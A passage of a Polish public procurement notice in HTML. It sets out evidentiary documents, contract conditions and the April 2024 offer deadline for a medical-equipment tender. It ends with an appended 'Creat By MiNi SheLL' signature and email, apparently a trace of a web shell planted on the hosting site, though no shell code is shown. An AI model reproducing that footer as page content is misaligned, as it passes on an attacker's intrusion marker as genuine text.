<br/>środków dowodowych, aktualnych na dzień ich złożenia.<br/>5) Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli <br/>może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w <br/>szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o <br/>informatyzacji działalności podmiotów realizujących zadania publiczne, o ile <br/>wykonawca wskazał w oświadczeniu, że:<br/>a) posiadają zarejestrowaną działalność gospodarczą,<br/>b) posiadają niezbędną wiedzę i doświadczenie, <br/>c) posiadają zaplecze techniczne.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W celu potwierdzenia zgodności oferowanych produktów z wymaganiami określonymi w <br/>opisie przedmiotu zamówienia, Zamawiający żąda złożenia wraz z ofertą oświadczenia, że <br/>zaoferowany sprzęt medyczny dopuszczony jest do obrotu i stosowania w podmiotach <br/>leczniczych, zgodnie z ustawą z dnia 7 kwietnia 2022 r. o wyrobach medycznych <br/>(Dz.U.2022.974 ze zm.) i posiada stosowne certyfikaty, deklaracje zgodności lub inne <br/>dokumenty wymagane przez prawo.<br/>2. Jeżeli Wykonawca nie złoży przedmiotowych środków dowodowych lub złożone <br/>przedmiotowe środki dowodowe będą niekompletne, Zamawiający wezwie do ich złożenia <br/>lub uzupełnienia w wyznaczonym terminie. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Uzupełnieniu podlegają wszystkie przedmiotowe środki dowodowe. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Zgodnie z załącznikiem do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z załącznikiem nr 3 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-04-19 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/pzsolesnica</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-04-19 09:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-05-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com